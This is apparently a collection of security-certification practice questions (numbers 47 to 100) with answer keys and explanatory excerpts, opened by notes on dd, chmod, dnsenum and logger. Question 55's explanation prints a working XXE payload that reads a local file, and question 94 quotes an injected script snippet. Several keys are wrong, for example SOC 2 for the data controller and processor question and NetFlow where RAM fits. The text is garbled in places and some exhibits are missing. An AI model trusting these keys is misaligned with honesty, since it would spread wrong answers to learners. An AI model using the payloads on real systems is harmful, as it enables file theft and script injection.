The Linux dd command is one of the most powerful utilities which can be used in a variety of ways. This tool is mainly used for copying and converting data, hence it stands for data duplicator. This tool can be used for: Backing up and restoring an entire hard drive or a partition.

The chmod command is used to modify permissions. It can be used in symbolic mode or absolute mode. In symbolic mode, the command works as follows: chmod g+w, o-x home

The effect of this command is to append write permission to the group context and remove execute permission from the other context. By contrast, the command can also be used to replace existing permissions. For example, the following command applies
the configuration shown in the first permission string: chmod u=rwx,g=rx,o=rx home

In absolute mode, permissions are assigned using octal notation, where r=4, w=2, and x=1. 
For example, the following command has the same effect: chmod 755 home

Dnsenum - While you can use tools such as dig and whois to query name records and hosting details and to check that external DNS services are not leaking too much information, a tool such as dnsenum packages a number of tests into a single query (github.com/fwaeytens/dnsenum). As well as hosting information and name records, dnsenum can try to work out the IP address ranges that are in use.

The logger command writes input to the local system log or to a remote syslog server (linux.die.net/man/1/logger). You can use the command in a script to write any text string or use the -f option to write the contents of another file. You can also write the
output of commands by enclosing the command in backticks. The following command writes the name of the local machine along with the text "up" to the syslog server at 10.1.0.242: logger -n 10.1.0.242 `hostname` up

END
QUESTION 47
Which of the following is MOST likely to outline the roles and responsibilities of data controllers and data processors?

A. SSAE SOC 2 
B. PCI DSS
C. GDPR
D. ISO 31000

Answer: A

The Statements on Standards for Attestation Engagements (SSAE) are audit specifications developed by the American Institute of Certified Public Accountants (AICPA). These audits are designed to assure consumers that service providers, 
notably cloud providers, but including any type of hosted or third-party service meet professional standards. (aicpa.org/interestareas/frc/assuranceadvisoryservices/serviceorganization-smanagement.html). 
Within SSAE No. 18 (the current specification), there are several levels of reporting:

> Service Organization Control (SOC2) - evaluates the internal controls implemented by the service provider to ensure compliance with Trust Services Criteria (TSC) when storing and processing customer data. TSC refers to security, confidentiality, integrity, availability, and privacy properties. An SOC2 Type I report assesses the system design, while a Type II report assesses the ongoing effectiveness of the security architecture over a period of 6-12 months. SOC2 reports are highly detailed and designed to be restricted. They should only be shared with the auditor and regulators and with important partners under non disclosure agreement (NDA) terms.

> SOC3 - a less detailed report certifying compliance with SOC2. SOC3 reports can be freely distributed.

PCI DSS (Payment Card Industry Data Security Standard) Information security standard for organizations that process
credit or bank card payments. 

Privacy requires that collection and processing of personal information be both secure and fair. Fairness and the right to privacy, as enacted by regulations such as the European Union's General Data Protection Regulation (GDPR), means that personal data cannot be collected, processed, or retained without the individual's informed consent. Informed consent means that the
data must be collected and processed only for the stated purpose, and that purpose must be clearly described to the user in plain language, not legalese.

Where ISO 21K is a cybersecurity framework, ISO 31K (iso.org/iso-31000-riskmanagement.html) is an overall framework for enterprise risk management (ERM). ERM considers risks and opportunities beyond cybersecurity by including financial,
customer service, competition, and legal liability factors. ISO 31K establishes best practices for performing risk assessments.

END
QUESTION 48
Phishing and spear-phishing attacks have been occurring more frequently against a company's staff. Which of the following would MOST likely help mitigate this issue?

A. DNSSEC and DMARC 
B. DNS query logging
C. Exact mail exchanger records in the DNS 
D. The addition of DNS conditional forwarders

Answer: A

DNSSEC (Domain Name System Security Extensions) A security protocol that provides authentication of DNS data
and upholds DNS data integrity.

DMARC (Domain-based Message Authentication, Reporting and Conformance) is an email authentication protocol. It is designed to give email domain owners the ability to protect their domain from unauthorized use, commonly known as email spoofing. The purpose and primary outcome of implementing DMARC is to protect a domain from being used in business email compromise attacks, phishing emails, email scams and other cyber threat activities.
Once the DMARC DNS entry is published, any receiving email server can authenticate the incoming email based on the instructions published by the domain owner within the DNS entry. If the email passes the authentication, it will be delivered and can be trusted. If the email fails the check, depending on the instructions held within the DMARC record the email could be delivered, quarantined or rejected. For example, one email forwarding service delivers the mail, but as "From: no-reply@<forwarding service>".[1]
DMARC extends two existing email authentication mechanisms, Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM). It allows the administrative owner of a domain to publish a policy in their DNS records to specify which mechanism (DKIM, SPF or both) is employed when sending email from that domain; how to check the From: field presented to end users; how the receiver should deal with failures - and a reporting mechanism for actions performed under those policies.

END
QUESTION 49
On which of the following is the live acquisition of data for forensic analysis MOST dependent? (Choose two.)

A. Data accessibility 
B. Legal hold
C. Cryptographic or hash algorithm 
D. Data retention legislation
E. Value and volatility of data 
F. Right-to-audit clauses

Answer: EF

Right to audit clause. gives an organization the right to review the supplier's internal records to determine whether fraud occurred.

With an on-premises investigation, the right to seize and analyze devices is usually fairly unproblematic. There may be availability issues with taking a system out of service, and bring-your-own-device policies can be more complex, but essentially as all
the equipment is the company's property, there are no third-party obstacles. While companies can operate private clouds, forensics in a public cloud are complicated by the right to audit permitted to you by your service level agreement (SLA) with the cloud provider.

Acquisition is the process of obtaining a forensically clean copy of data from a device held as evidence. If the computer system or device is not owned by the organization, there is the END
QUESTION of whether search or seizure is legally valid. This impacts bringyour-own-device (BYOD) policies. For example, if an employee is accused of fraud you must verify that the employee's equipment and data can be legally seized and searched. Any mistake may make evidence gained from the search inadmissible.
Data acquisition is also complicated by the fact that it is more difficult to capture evidence from a digital crime scene than it is from a physical one. Some evidence will be lost if the computer system is powered off; on the other hand, some evidence may
be unobtainable until the system is powered off. Additionally, evidence may be lost depending on whether the system is shut down or "frozen" by suddenly disconnecting the power.

END
QUESTION 50
Which of the following incident response steps involves actions to protect critical systems while maintaining business operations?

A. Investigation 
B. Containment 
C. Recovery
D. Lessons learned

Answer: B

Incident Response Steps – Identification, Containment, Eradication, Recovery, and Lessons Learned.

END
QUESTION 51
A security auditor is reviewing vulnerability scan data provided by an internal security team. 
Which of the following BEST indicates that valid credentials were used?

A. The scan results show open ports, protocols, and services exposed on the target host 
B. The scan enumerated software versions of installed programs
C. The scan produced a list of vulnerabilities on the target host 
D. The scan identified expired SSL certificates

Answer: C

END
QUESTION 52
Which of the following BEST explains the difference between a data owner and a data custodian?

A. The data owner is responsible for adhering to the rules for using the data, while the data custodian is responsible for determining the corporate governance regarding the data
B. The data owner is responsible for determining how the data may be used, while the data custodian is responsible for implementing the protection to the data
C. The data owner is responsible for controlling the data, while the data custodian is responsible for maintaining the chain of custody when handling the data
D. The data owner grants the technical permissions for data access, while the data custodian maintains the database access controls to the data

Answer: B

END
QUESTION 53
A network engineer needs to build a solution that will allow guests at the company's headquarters to access the Internet via WiFi. This solution should not allow access to the internal corporate network, but it should require guests to sign off on the acceptable use policy before accessing the Internet. Which of the following should the engineer employ to meet these requirements?

A. Implement open PSK on the APs 
B. Deploy a WAF
C. Configure WPS on the APs 
D. Install a captive portal

Answer: D

WAF (web application firewall) A firewall designed specifically to protect software running on web servers and their backend
databases from code injection and DoS attacks. 
23
END
QUESTION 54
An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following would be the MOST acceptable?

A. SED 
B. HSM 
C. DLP 
D. TPM

Answer: A

HDDs and SSDs that are self-encrypting drives (SEDs) support another option, invoking a SANITIZE command set in SATA and SAS standards from 2012 to perform a crypto erase. Drive vendors implement this as Instant Secure Erase (ISE). With an SED, all data on the drive is encrypted using a media encryption key. When the erase command is issued, the MEK is erased, rendering the data unrecoverable.

END
QUESTION 55
A security analyst receives a SIEM alert that someone logged in to the appadmin test account, which is only used for the early detection of attacks. The security analyst then reviews the following application log:

See document question 55.

Which of the following can the security analyst conclude?

A. A replay attack is being conducted against the application.
B. An injection attack is being conducted against a user authentication system.
C. A service account password may have been changed, resulting in continuous failed logins within the application.
D. A credentialed vulnerability scanner attack is testing several CVEs against the application.

Answer: B

XML and LDAP Injection Attacks

Extensible Markup Language (XML) Injection - (XML) is used by apps for authentication and authorizations, and for other types of data exchange and uploading. Data submitted via XML with no encryption or input validation is vulnerable to spoofing, request
forgery, and injection of arbitrary data or code. For example, an XML External Entity (XXE) attack embeds a request for a local resource (owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing).

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY bar
SYSTEM "file:///etc/config"> ]>
<bar>&bar;</bar>

This defines an entity named bar that refers to a local file path. A successful attack will return the contents of /etc/config as part of the response.

END
QUESTION 56
In which of the following situations would it be BEST to use a detective control type for mitigation?

A. A company implemented a network load balancer to ensure 99.999% availability of its web application.
B. A company designed a backup solution to increase the chances of restoring services in case of a natural disaster.
C. A company purchased an application-level firewall to isolate traffic between the accounting department and the information technology department.
D. A company purchased an IPS system, but after reviewing the requirements, the appliance was supposed to monitor, not block, any traffic.
E. A company purchased liability insurance for flood protection on all capital assets.

Answer: D

END
QUESTION 57
The IT department's on-site developer has been with the team for many years. Each time an application is released, 
the security team is able to identify multiple vulnerabilities. Which of the following would BEST help the team ensure 
the application is ready to be released to production?

A. Limit the use of third-party libraries. 
B. Prevent data exposure queries.
C. Obfuscate the source code.
D. Submit the application to QA before releasing it.

Answer: D

END
QUESTION 58
A cybersecurity analyst needs to implement secure authentication to third-party websites without users' passwords. Which of the following would be the BEST way to achieve this objective?

A. OAuth 
B. SSO 
C. SAML 
D. PAP

Answer: A

A federated network or cloud needs specific protocols and technologies to implement user identity assertions and transmit attestations between the principal, the relying party, and the identity provider. Security Assertions Markup Language (SAML) is
one such solution. SAML attestations (or authorizations) are written in eXtensible Markup Language (XML). Communications are established using HTTP/HTTPS and the Simple Object Access Protocol (SOAP). These secure tokens are signed using the XML signature specification. The use of a digital signature allows the relying party to trust the identity provider. As an example of a SAML implementation, Amazon Web Services (AWS) can function as a SAML service provider. This allows companies using AWS to develop cloud applications to manage their customers' user identities and provide them with permissions on AWS without having to create accounts for them on AWS directly.

OAuth is an open standard for authorization many companies use to provide secure access to protected resources. Instead of creating a different account for each web site you access, you can often use the same account that
you've created with Google, Facebook, PayPal, Microsoft, or Twitter.

Authentication and authorization for a RESTful API is often implemented using the Open Authorization (OAuth) protocol. 
OAuth is designed to facilitate sharing of information (resources) within a user profile between sites. The user creates a
password-protected account at an identity provider (IdP). The user can use that account to log on to an OAuth consumer site without giving the password to the consumer site. A user (resource owner) can grant a client an authorization to access
some part of their account. A client in this context is an app or consumer site.

END
QUESTION 59
An analyst needs to identify the applications a user was running and the files that were open before the user's computer was shut off by holding down the power button. Which of the following would MOST likely contain that information?

A. NGFW 
B. Pagefile 
C. NetFlow 
D. RAM

Answer: C

Netflow/IPFIX - A flow collector is a means of recording metadata and statistics about network traffic rather than recording each frame. Network traffic and flow data may come from a wide variety of sources (or probes), such as switches, routers, firewalls, web proxies, and so forth. NetFlow is a Cisco-developed means of reporting network flow information to a structured database. NetFlow has been redeveloped as the IP Flow Information Export (IPFIX).

What Is a Next-Generation Firewall (NGFW)? - Cisco

What is a next-generation firewall?
A next-generation firewall (NGFW) is a network security device that provides capabilities beyond a traditional, stateful firewall. While a traditional firewall typically provides stateful inspection of incoming and outgoing network traffic, a next-generation firewall includes additional features like application awareness and control, integrated intrusion prevention, and cloud-delivered threat intelligence.

A traditional firewall provides stateful inspection of network traffic. It allows or blocks traffic based on state, port, and protocol, and filters traffic based on administrator-defined rules.
A next-generation firewall (NGFW) does this, and so much more. In addition to access control, NGFWs can block modern threats such as advanced malware and application-layer attacks. According to Gartner's definition, a next-generation firewall must include:
Standard firewall capabilities like stateful inspection
Integrated intrusion prevention
Application awareness and control to see and block risky apps
Threat intelligence sources
Upgrade paths to include future information feeds
Techniques to address evolving security threats

END
QUESTION 60
A remote user recently took a two-week vacation abroad and brought along a corporate-owned laptop. 
Upon returning to work, the user has been unable to connect the laptop to the VPN. 
Which of the following is the MOST likely reason for the user's inability to connect the laptop to the VPN?

A. Due to foreign travel, the user's laptop was isolated from the network.
B. The user's laptop was quarantined because it missed the latest patch update. 
C. The VPN client was blacklisted.
D. The user's account was put on a legal hold.

Answer: B

If a user enters the correct credentials at a VPN gateway but his or her IP address shows him/her to be in a different country than expected, access controls might be applied to restrict the privileges granted or refuse access completely. Another example is where a user appears to login from different geographic locations that travel time would make physically impossible.

END
QUESTION 61
An organization needs to implement more stringent controls over administrator/root credentials and service accounts. Requirements for the project include:

Check-in/checkout of credentials
The ability to use but not know the password 
Automated password changes
Logging of access to credentials

Which of the following solutions would meet the requirements?

A. OAuth 2.0
B. Secure Enclave
C. A privileged access management system 
D. An OpenID Connect authentication system

Answer: C

What is PAM? Privileged Access Management Explained (cyberark.com)

Even with the most carefully designed role-based permissions, it is almost impossible to eliminate use of shared/device/root passwords completely. Enterprise privilege access management products provide a solution for storing these high-risk
credentials somewhere other than a spreadsheet and for auditing elevated privileges generally (gartner.com/reviews/market/privileged-access-management).

OpenID Connect is a lightweight authentication layer built on top of the OAuth 2.0 authorization protocol. It compliments having local accounts by enabling users to authenticate using accounts they have on other systems. Users who avoid signing up for new accounts can then use an account they already have to sign into your website. By using OpenID Connect, you delegate user authentication to other providers, making it easy for users with existing accounts to authenticate to your system.
Because OpenID Connect is built on OAuth 2.0, its token flow is similar. OAuth 2.0 is only an authorization protocol, so it sends an access token that grants access to particular APIs. OpenID Connect adds to this an identity token that passes user information like name and email, provided the user has authenticated and granted permission.
Secure Enclave is a hardware component of modern Apple mobile devices, such as the iPhone. It is a coprocessor of the device's ARM CPU, in models S2, A7, and later A-series processors. It provides all cryptographic operations for authenticating the user and is designed to be secure even if the iOS kernel is hacked.
Secure Enclave was developed in conjunction with Apple's Touch ID technology, which can identify a user by his or her fingerprint. They were introduced together on September 10, 2013, as part of Apple's announcement of the iPhone 5s, the first device to feature Touch ID.

END
QUESTION 62 (Tricky)
Several employees return to work the day after attending an industry trade show. That same day, the security manager notices several malware alerts coming from each of the employee's workstations. The security manager investigates but finds no signs of an attack on the perimeter firewall or the NIDS. Which of the following is MOST likely causing the malware alerts?

A. A worm that has propagated itself across the intranet, which was initiated by presentation media 
B. A fileless virus that is contained on a vCard that is attempting to execute an attack
C. A Trojan that has passed through and executed malicious code on the hosts
D. A USB flash drive that is trying to run malicious code but is being blocked by the host firewall

Answer: B

A security researcher has published details and proof-of-concept (PoC) code for an unpatched Windows vulnerability that affects the way Windows handles vCard files (VCFs). the vulnerability exists in the way the Windows OS processes vCard files (VCFs).
A threat actor can craft a malicious VCF that displays a benign link, which when clicked by the user, can trigger the execution of malicious code instead of viewing the URL.
Fileless malware does not write its code to disk. The malware uses memory resident techniques to run in its own process, within a host process or dynamic link library (DLL), or within a scripting host. This does not mean that there is no disk activity at all, however. The malware may change registry values to achieve persistence (executing if the host computer is restarted). The initial execution of the malware may also depend on the user running a downloaded script, file attachment, or Trojan software package.

END
QUESTION 63
After reading a security bulletin, a network security manager is concerned that a malicious actor may have breached the network using the same software flaw. The exploit code is publicly available and has been reported as being used against other industries in the same vertical. Which of the following should the network security manager consult FIRST to determine a priority list for forensic review?

A. The vulnerability scan output 
B. The IDS logs
C. The full packet capture data 
D. The SIEM alerts

Answer: D

Coupled with an attack framework, notification will provide a general sense of where to look for or expect indicators of malicious activity. Incident analysis is greatly facilitated by a security information and event management (SIEM) system. 
A SIEM parses network traffic and log data from multiple sensors, appliances, and hosts and normalizes the information to standard field types. An SIEM alert lists an event on a dashboard or incident handling system for an agent to assess. 
The agent classifies the event and either dismisses it to the log or escalates it as an incident.

Vulnerability Scanning: What It Is and How to Do It Right (esecurityplanet.com)

A vulnerability scanner is an application that identifies and creates an inventory of all the systems (including servers, desktops, laptops, virtual machines, containers, firewalls, switches, and printers) connected to a network. For each device that it identifies it also attempts to identify the operating system it runs and the software installed on it, along with other attributes such as open ports and user accounts.

Most vulnerability scanners will also attempt to log in to systems using default or other credentials in order to build a more detailed picture of the system. After building up an inventory, the vulnerability scanner checks each item in the inventory against one or more databases of known vulnerabilities to see if any items are subject to any of these vulnerabilities.
The result of a vulnerability scan is a list of all the systems found and identified on the network, highlighting any that have known vulnerabilities that may need attention.

END
QUESTION 64
A financial organization has adopted a new secure, encrypted document-sharing application to help with its customer loan process. Some important PII needs to be shared across this new platform, but it is getting blocked by the DLP systems. Which of the following actions will BEST allow the PII to be shared with the secure application without compromising the organization's security posture?

A. Configure the DLP policies to allow all PII
B. Configure the firewall to allow all ports that are used by this application 
C. Configure the antivirus software to allow the application
D. Configure the DLP policies to whitelist this application with the specific PII 
E. Configure the application to encrypt the PII

Answer: D

END
QUESTION 65
An auditor is performing an assessment of a security appliance with an embedded OS that was vulnerable during the last two assessments. Which of the following BEST explains the appliance's vulnerable state?

A. The system was configured with weak default security settings. 
B. The device uses weak encryption ciphers.
C. The vendor has not supplied a patch for the appliance.
D. The appliance requires administrative credentials for the assessment.

Answer: C

END
QUESTION 66
A company's bank has reported that multiple corporate credit cards have been stolen over the past several weeks. The bank has provided the names of the affected cardholders to the company's forensics team to assist in the cyber-incident investigation. An incident responder learns the following information:

- The timeline of stolen card numbers corresponds closely with affected users making Internet-based purchases from diverse websites via enterprise desktop PCs.

- All purchase connections were encrypted, and the company uses an SSL inspection proxy for the inspection of encrypted traffic of the hardwired network.

- Purchases made with corporate cards over the corporate guest WiFi network, where no SSL inspection occurs, were unaffected.

Which of the following is the MOST likely root cause?

A. HTTPS sessions are being downgraded to insecure cipher suites
B. The SSL inspection proxy is feeding events to a compromised SIEM 
C. The payment providers are insecurely processing credit card charges
D. The adversary has not yet established a presence on the guest WiFi network

Answer: D

END
QUESTION 67
A security analyst has been asked to investigate a situation after the SOC started to receive alerts from the SIEM. The analyst first looks at the domain controller and finds the following events:

See document question 67.

To better understand what is going on, the analyst runs a command and receives the following output:

Based on the analyst's findings, which of the following attacks is being executed?

A. Credential harvesting (Credential Stuffing)
B. Keylogger
C. Brute-force 
D. Spraying

Answer: D

Password spraying is a horizontal brute-force online attack. This means that the attacker chooses one or more common passwords (for example, password or 123456) and tries them in conjunction with multiple usernames.

Event ID 4771 - This event generates every time the Key Distribution Center fails to issue a Kerberos Ticket Granting Ticket (TGT). This problem can occur when a domain controller doesn't have a certificate installed for smart card authentication (for example, with a “Domain Controller” or “Domain Controller Authentication” template), the user's password has expired, or the wrong password was provided. This event generates only on domain controllers.

END
QUESTION 68
Which of the following cloud models provides clients with servers, storage, and networks but nothing else?

A. SaaS 
B. PaaS 
C. IaaS 
D. DaaS

Answer: C

What is Desktop as a Service (DAAS)? - Citrix

Desktops-as-a-Service or simply DaaS, securely delivers virtual apps and desktops from the cloud to any device or location. This desktop virtualization solution provisions secure saas and legacy applications as well as full Windows-based virtual desktops and delivers them to your workforce. DaaS offers a simple and predictable pay-as-a-go subscription model, making it easy to scale up or down on-demand.

END
QUESTION 69
A network administrator needs to build out a new datacenter, with a focus on resiliency and uptime. Which of the following would BEST meet this objective? (Choose two.)

A. Dual power supply
B. Off-site backups
C. Automatic OS upgrades 
D. NIC teaming
E. Scheduled penetration testing 
F. Network-attached storage

Answer: AD

END
QUESTION 70
A researcher has been analyzing large data sets for the last ten months. The researcher works with colleagues from other institutions and typically connects via SSH to retrieve additional data. Historically, this setup has worked without issue, but the researcher recently started getting the following message:

See document question 70.

Which of the following network attacks is the researcher MOST likely experiencing?

A. MAC cloning 
B. Evil twin
C. Man-in-the-middle 
D. ARP poisoning

Answer: C

END
QUESTION 71
A network administrator has been alerted that web pages are experiencing long load times. After determining it is not a routing or DNS issue, the administrator logs in to the router, runs a command, and receives the following output:

CPU 0 percent busy, from 300 sec ago
1 sec ave: 99 percent busy
5 sec ave: 97 percent busy
1 min ave: 83 percent busy

Which of the following is the router experiencing?

A. DDoS attack 
B. Memory leak 
C. Buffer overflow
D. Resource exhaustion

Answer: D

END
QUESTION 72
A company provides mobile devices to its users to permit access to email and enterprise applications. The company recently started allowing users to select from several different vendors and device models. When configuring the MDM, which of the following is a key security implication of this heterogeneous device approach?

A. The most common set of MDM configurations will become the effective set of enterprise mobile security controls.
B. All devices will need to support SCEP-based enrollment; therefore, the heterogeneity of the chosen architecture may unnecessarily expose private keys to adversaries.
C. Certain devices are inherently less secure than others, so compensatory controls will be needed to address the delta between device vendors.
D. MDMs typically will not support heterogeneous deployment environments, so multiple MDMs will need to be installed and configured.

Answer: A

Bring your own device (BYOD) - the mobile device is owned by the employee. The mobile will have to meet whatever profile is required by the company (in terms of OS version and functionality) and the employee will have to agree on the installation of corporate apps and to some level of oversight and auditing. This model is usually the most popular with employees but poses the most difficulties for security and network managers.

SCEP - Simple Certificate Enrollment Protocol. A method of requesting a certificate from a CA.

END
QUESTION 73
A pharmaceutical sales representative logs on to a laptop and connects to the public WiFi to check emails and update reports. Which of the following would be BEST to prevent other devices on the network from directly accessing the laptop? (Choose two.)

A. Trusted Platform Module 
B. A host-based firewall
C. A DLP solution
D. Full disk encryption 
E. A VPN
F. Antivirus software

Answer: BE 

END
QUESTION 74
A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly. Which of the following technologies should the IT manager use when implementing MFA?

A. One-time passwords 
B. Email tokens
C. Push notifications
D. Hardware authentication

Answer: C

Push notifications are store services (such as Apple Push Notification Service and Google Cloud to Device Messaging) that an app or website can use to display an alert on a mobile device. Users can choose to disable notifications for an app, but otherwise
the app developer can target notifications to some or all users with that app installed. Developers need to take care to properly secure the account and services used to send push notifications. There have been examples in the past of these accounts being
hacked and used to send fake communications.

END
QUESTION 75
The CSIRT is reviewing the lessons learned from a recent incident. A worm was able to spread unhindered throughout the network and infect a large number of computers and servers. Which of the following recommendations would be BEST to mitigate the impacts of a similar incident in the future?

A. Install a NIDS device at the boundary. 
B. Segment the network with firewalls. 
C. Update all antivirus signatures daily. 
D. Implement application blacklisting.

Answer: B

A dedicated cyber incident response team (CIRT)/computer security incident response team (CSIRT)/computer emergency response team (CERT) as a single point-of contact for the notification of security incidents. This function might be handled by the
SOC or it might be established as an independent business unit

END
QUESTION 76
A company is adopting a BYOD policy and is looking for a comprehensive solution to protect company information on user devices. Which of the following solutions would BEST support the policy?

A. Mobile device management 
B. Full-device encryption
C. Remote wipe 
D. Biometrics

Answer: A

END
QUESTION 77
A development team employs a practice of bringing all the code changes from multiple team members into the same development project through automation. A tool is utilized to validate the code and track source code through version control. Which of the following BEST describes this process?

A. Continuous delivery
B. Continuous integration 
C. Continuous validation 
D. Continuous monitoring

Answer: B

continuous integration Software development method in which code updates are tested and committed to a development 
or build server/code repository rapidly.

continuous delivery Software development method in which app and platform requirements are frequently tested 
and validated for immediate availability.

continuous monitoring A technique of constantly evaluating an environment for changes so that new risks may be
more quickly detected and business operations improved upon. Also known as continuous security monitoring or CSM.

END
QUESTION 78
A cybersecurity administrator needs to add disk redundancy for a critical server. The solution must have a two-drive failure for better fault tolerance. Which of the following RAID levels should the administrator select?

A. 0 
B. 1 
C. 5 
D. 6

Answer: D

END
QUESTION 79
Which of the following BEST explains the reason why a server administrator would place a document named password.txt on the desktop of an administrator account on a server?

A. The document is a honeyfile and is meant to attract the attention of a cyberintruder. 
B. The document is a backup file if the system needs to be recovered.
C. The document is a standard file that the OS needs to verify the login credentials.
D. The document is a keylogger that stores all keystrokes should the account be compromised.

Answer: A

END
QUESTION 80
A security administrator has generated an SSH key pair to authenticate to a new server. Which of the following should the security administrator do NEXT to use the keys securely for authentication? (Choose 2)

A. Install the public key on the server 
B. Install the private key on the server. 
C. Encrypt the public key.
D. Encrypt the private key.
E. Install both keys on the server.
F. Securely wipe the certificate signing request.

Answer: AD

https://www.ssh.com/ssh/command/

https://www.ubuntupit.com/how-to-install-configure-and-enable-ssh-service-in-linux/


END
QUESTION 81
A company has just experienced a malware attack affecting a large number of desktop users. The antivirus solution was not able to block the malware, but the HIDS alerted to C2 calls as 'Troj.Generic'. Once the security team found a solution to remove the malware, they were able to remove the malware files successfully, and the HIDS stopped alerting. The next morning, however, the HIDS once again started alerting on the same desktops, and the security team discovered the files were back. Which of the following BEST describes the type of malware infecting this company's network?

A. Trojan 
B. Spyware 
C. Rootkit 
D. Botnet

Answer: A

What is Trojan.Generic + How to Remove? Update Jan 2020 | CFOC.ORG

END
QUESTION 82
An organization wants to host an externally accessible web server that will not contain sensitive user information. Any sensitive information will be hosted on file servers. Which of the following is the BEST architecture configuration for this organization?

A. Host the web server in a DMZ and the file servers behind a firewall 
B. Host the web server and the file servers in a DMZ
C. Host the web server behind a firewall and the file servers in a DMZ 
D. Host both the web server and file servers behind a firewall

Answer: A

END
QUESTION 83
Which of the following describes the ability of code to target a hypervisor from inside a guest OS?

A. Fog computing 
B. VM escape
C. Software-defined networking 
D. Image forgery
E. Container breakout

Answer: B

The term “container breakout” is used to indicate a situation in which a program running inside a Docker container can overcome isolation mechanisms and gain additional capabilities or access to confidential information on the host. To prevent such breakthroughs, the number of container capabilities by default is reduced.

END
QUESTION 84
A company posts a sign indicating its server room is under video surveillance. Which of the following control types is represented?

A. Administrative 
B. Detective
C. Technical 
D. Deterrent

Answer: D

END
QUESTION 85
A security administrator has received multiple calls from the help desk about customers who are unable to access the organization's web server. Upon reviewing the log files. the security administrator determines multiple open requests have been made from multiple IP addresses, which is consuming system resources. Which of the following attack types does this BEST describe?

A. DDoS 
B. DoS
C. Zero day 
D. Logic bomb

Answer: A

END
QUESTION 86
A network administrator was provided the following output from a vulnerability scan:

See document question 86.

The network administrator has been instructed to prioritize remediation efforts based on overall risk to the enterprise. Which of the following plugin IDs should be remediated FIRST?

A. 10
B. 11 
C. 12 
D. 13 
E. 14

Answer: D

END
QUESTION 87
A junior systems administrator noticed that one of two hard drives in a server room had a red error notification. 
The administrator removed the hard drive to replace it but was unaware that the server was configured in an array. Which of the following configurations would ensure no data is lost?

A. RAID 0 
B. RAID 1 
C. RAID 2 
D. RAID 3

Answer: B

END
QUESTION 88
A system in the network is used to store proprietary secrets and needs the highest level of security possible. Which of the following should a security administrator implement to ensure the system cannot be reached from the Internet?

A. VLAN 
B. Air gap 
C. NAT
D. Firewall

Answer: B 

An air gap, air wall or air gapping is a network security measure employed on one or more computers to ensure that a secure computer network is physically isolated from unsecured networks, such as the public Internet or an unsecured local area network. It means a computer or network has no network interfaces connected to other networks, with a physical or conceptual air gap, analogous to the air gap used in plumbing to maintain water quality.

END
QUESTION 89
Which of the following is the BEST use of a WAF?

A. To protect sites on web servers that are publicly accessible
B. To allow access to web services of internal users of the organization. 
C. To maintain connection status of all HTTP requests
D. To deny access to all websites with certain contents

Answer: A

END
QUESTION 90
4A transitive trust:

A. is automatically established between a parent and a child. 
B. is used to update DNS records.
C. allows access to untrusted domains.
D. can be used in place of a hardware token for logins.

Answer: A

END
QUESTION 91
A systems administrator wants to disable the use of usernames and passwords for SSH authentication and enforce key-based authentication. Which of the following should the administrator do NEXT to enforce this new configuration?

A. Issue a public/private key pair for each user and securely distribute a private key to each employee.
B. Instruct users on how to create a public/private key pair and install users' public keys on the server.
C. Disable the username and password authentication and enable TOTP in the sshd.conf file.
D. Change the default SSH port. enable TCP tunneling. and provide a pre-configured SSH client.

Answer: B

END
QUESTION 92
Which of the following would MOST likely be a result of improperly configured user accounts?

A. Resource exhaustion 
B. Buffer overflow
C. Session hijacking 
D. Privilege escalation

Answer: D

Buffer Overflow - DEP/NX Protection - Win32 apps | Microsoft Docs

END
QUESTION 93
An organization is concerned about video emissions from users' desktops. Which of the following is the BEST solution to implement?

A. Screen filters
B. Shielded cables
C. Spectrum analyzers 
D. Infrared detection

Answer: A

END
QUESTION 94
A security administrator receives alerts from the perimeter UTM. Upon checking the logs, the administrator finds the following output:

Time: 12/25 0300
5From Zone: Untrust 
To Zone: DMZ
Attacker: externalip.com 
Victim: 172.16.0.20
To Port: 80 Action: Alert Severity: Critical

When examining the PCAP associated with the event, the security administrator finds the following information:

<script> alert ("Click here for important information regarding your account! http://externalip.com/account.php"); </script>

Which of the following actions should the security administrator take?

A. Upload the PCAP to the IDS in order to generate a blocking signature to block the traffic.
B. Manually copy the <script> data from the PCAP file and generate a blocking signature in the HIDS to block the traffic for future events.
C. Implement a host-based firewall rule to block future events of this type from occurring.
D. Submit a change request to modify the XSS vulnerability signature to TCP reset on future attempts.

Answer: D

A protocol analyzer (or packet analyzer) works in conjunction with a sniffer to perform traffic analysis. You can either analyze a live capture or open a saved capture (.pcap) file.

END
QUESTION 95
Which of the following encryption algorithms require one encryption key? (Select TWO).

A. MD5 
B. 3DES
C. BCRYPT 
D. RC4
E. DSA

Answer: BD

END
QUESTION 96
A company moved into a new building next to a sugar mill. Cracks have been discovered in the walls of the server room, which is located on the same side as the sugar mill loading docks. The cracks are believed to have been caused by heavy trucks. Moisture has begun to seep into the server room, causing extreme humidification problems and equipment failure. Which of the following BEST describes the type of threat the organization faces?

A. Foundational 
B. Man-made
C. Environmental 
D. Natural

Answer: C

END
QUESTION 97
Which of the following should a technician use to protect a cellular phone that is needed for an investigation 
to ensure the data will not be removed remotely?

A. Air gap
B. Secure cabinet 
C. Faraday cage 
D. Safe

Answer: C

END
QUESTION 98
Which of the following is the MOST likely motivation for a script kiddie threat actor?

A. Financial gain 
B. Notoriety
C. Political expression 
D. Corporate espionage

Answer: B

END
QUESTION 99 (Tricky)
Moving laterally within a network once an initial exploit is used to gain persistent access for the purpose of establishing further control of a system is known as:

A. pivoting
B. persistence.
C. active reconnaissance. 
D. a backdoor.

Answer: A

Persistence - the tester's ability to reconnect to the compromised host and use it as a remote access tool (RAT) or backdoor. 
To do this, the tester must establish a command and control (C2 or C&C) network to use to control the compromised
host, upload additional attack tools, and download exfiltrated data. The connection to the compromised host will typically require 
a malware executable to run after shut down/log off events and a connection to a network port and the attacker's IP address 
to be available.

Pivoting - hosts that hold the most valuable data are not normally able to access external networks directly. If the pen tester achieves a foothold on a perimeter server, a pivot allows them to bypass a network boundary and compromise servers
on an inside network. A pivot is normally accomplished using remote access and tunneling protocols, such as Secure Shell (SSH), virtual private networking (VPN), or remote desktop.

Lateral movement - gaining control over other hosts. This is done partly to discover more opportunities to widen access (harvesting credentials, detecting software vulnerabilities, and gathering other such "loot"), partly to identify where valuable data assets might be located, and partly to evade detection. Lateral movement usually involves executing the attack tools over remote process shares or using scripting tools, such as PowerShell.

END
QUESTION 100
